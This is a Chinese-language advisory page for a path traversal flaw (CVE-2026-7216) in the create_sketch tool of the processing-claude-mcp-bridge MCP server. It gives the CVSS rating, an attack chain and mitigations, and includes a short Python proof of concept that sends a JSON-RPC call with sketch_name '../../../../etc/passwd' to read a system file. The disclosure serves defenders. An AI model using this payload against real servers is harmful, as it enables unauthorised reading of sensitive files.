CVE-2026-7216 CVSS 7.3 高危

CVE-2026-7216: processing-claude-mcp-bridge路径遍历漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7216

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

donchelo processing-claude-mcp-bridge

漏洞概述

donchelo processing-claude-mcp-bridge 在 e017b20a4b592a45531a6392f494007f04e661bd 及之前的版本中存在路径遍历漏洞。该漏洞位于 processing_server.py 文件的 create_sketch 工具中，由于对 sketch_name 参数缺乏充分过滤，攻击者无需认证即可远程利用。目前漏洞利用代码已公开，攻击者可通过构造恶意参数访问系统敏感文件，建议尽快修复。

技术细节

该漏洞源于 donchelo/processing-claude-mcp-bridge 项目在处理用户请求时的输入验证缺失。受影响的组件位于 processing_server.py 文件中的 create_sketch 工具。该工具在接收 sketch_name 参数时，未对该参数进行有效的路径规范化处理或合法性校验，直接将其用于文件系统操作。由于未对路径分隔符（如 ../）进行过滤，攻击者可以通过发送特制的请求包，利用 sketch_name 参数实施路径遍历攻击。该漏洞属于网络远程利用，攻击复杂度低，且无需用户交互或身份认证。尽管官方显示受影响的具体版本号不详（采用滚动发布模式），但包含提交哈希 e017b20a4b592a45531a6392f494007f04e661bd 及之前的版本均受影响。

攻击链分析

STEP 1

侦查

攻击者识别出目标服务器运行了存在漏洞的 donchelo/processing-claude-mcp-bridge 服务。

STEP 2

漏洞利用

攻击者向 processing_server.py 发送特制的恶意请求，在 sketch_name 参数中注入路径遍历字符（如 ../）。

STEP 3

执行攻击

服务器端因未过滤该参数，导致攻击者能够访问预期目录之外的文件（如读取系统配置文件），造成信息泄露或进一步破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target endpoint (example)
target = "http://vulnerable-host:port/"

# Malicious payload attempting to read /etc/passwd via path traversal
payload = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "create_sketch",
        "arguments": {
            "sketch_name": "../../../../etc/passwd"
        }
    },
    "id": 1
}

try:
    response = requests.post(target, json=payload, timeout=5)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

donchelo processing-claude-mcp-bridge <= e017b20a4b592a45531a6392f494007f04e661bd

防御指南

临时缓解措施

在官方修复补丁发布前，建议严格限制对处理服务的网络访问，仅通过 VPN 或受信任的内部网络进行连接。管理员应检查服务器日志，寻找是否存在对 sketch_name 参数的可疑访问记录。此外，可在应用层面对输入参数进行临时过滤，拒绝包含 '../' 或绝对路径字符的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7216
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7216
3 Details https://www.cvedetails.com/cve/CVE-2026-7216/
4 VulDB https://vuldb.com/cve/CVE-2026-7216
5 Link https://github.com/donchelo/processing-claude-mcp-bridge/
6 Link https://github.com/donchelo/processing-claude-mcp-bridge/issues/1
7 Link https://vuldb.com/submit/802090
8 Link https://vuldb.com/vuln/359816
9 Link https://vuldb.com/vuln/359816/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表